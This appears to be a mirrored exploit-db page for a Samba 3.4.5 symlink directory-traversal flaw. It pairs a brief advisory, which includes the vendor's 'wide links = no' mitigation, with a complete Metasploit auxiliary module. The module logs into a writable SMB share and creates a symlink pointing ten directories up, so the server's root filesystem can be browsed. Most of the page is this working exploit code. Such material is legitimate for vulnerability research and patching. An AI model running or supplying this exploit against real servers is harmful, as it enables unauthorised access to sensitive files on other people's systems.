Samba 3.4.5 – Symlink Directory Traversal (Metasploit)

  • 作者: kingcope
    日期: 2010-02-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/33598/
  • source: https://www.securityfocus.com/bid/38111/info
    
    Samba is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
    
    Exploits would allow an attacker to access files outside of the Samba user's root directory to obtain sensitive information and perform other attacks.
    
    To exploit this issue, attackers require authenticated access to a writable share. Note that this issue may be exploited through a writable share accessible by guest accounts.
    
    NOTE: The vendor stated that this issue stems from an insecure default configuration. The Samba team advises administrators to set 'wide links = no' in the '[global]' section of 'smb.conf'.
    
    ##
    # $Id: samba_symlink_traversal.rb 8369 2010-02-05 06:38:24Z hdm $
    ##
    
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    
    
    require 'msf/core'
    
    
    class Metasploit3 < Msf::Auxiliary
    
    	# Exploit mixins should be called first
    	include Msf::Exploit::Remote::DCERPC
    	include Msf::Exploit::Remote::SMB
    	include Msf::Auxiliary::Report
    
    	# Aliases for common classes
    	SIMPLE = Rex::Proto::SMB::SimpleClient
    	XCEPT= Rex::Proto::SMB::Exceptions
    	CONST= Rex::Proto::SMB::Constants
    
    
    	def initialize
    		super(
    			'Name'=> 'Samba Symlink Directory Traversal',
    			'Version' => '$Revision: 8369 $',
    			'Description' => %Q{
    				This module exploits a directory traversal flaw in the Samba
    			CIFS server. To exploit this flaw, a writeable share must be specified.
    			The newly created directory will link to the root filesystem.
    			},
    			'Author'=>
    				[
    					'kcope', # http://lists.grok.org.uk/pipermail/full-disclosure/2010-February/072927.html
    					'hdm'# metasploit module
    				],
    			'License' => MSF_LICENSE
    		)
    
    		register_options([
    			OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server']),
    			OptString.new('SMBTARGET', [true, 'The name of the directory that should point to the root filesystem', 'rootfs'])
    		], self.class)
    
    	end
    
    
    	def run
    		print_status("Connecting to the server...")
    		connect()
    		smb_login()
    
    		print_status("Trying to mount writeable share #{datastore['SMBSHARE']}...")
    		self.simple.connect(datastore['SMBSHARE'])
    
    		print_status("Trying to link '#{datastore['SMBTARGET']}' to the root filesystem...")
    		self.simple.client.symlink(datastore['SMBTARGET'], "../" * 10)
    
    		print_status("Now access the following share to browse the root filesystem:")
    		print_status("\t\\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['SMBTARGET']}\\")
    		print_line("")
    	end
    
    end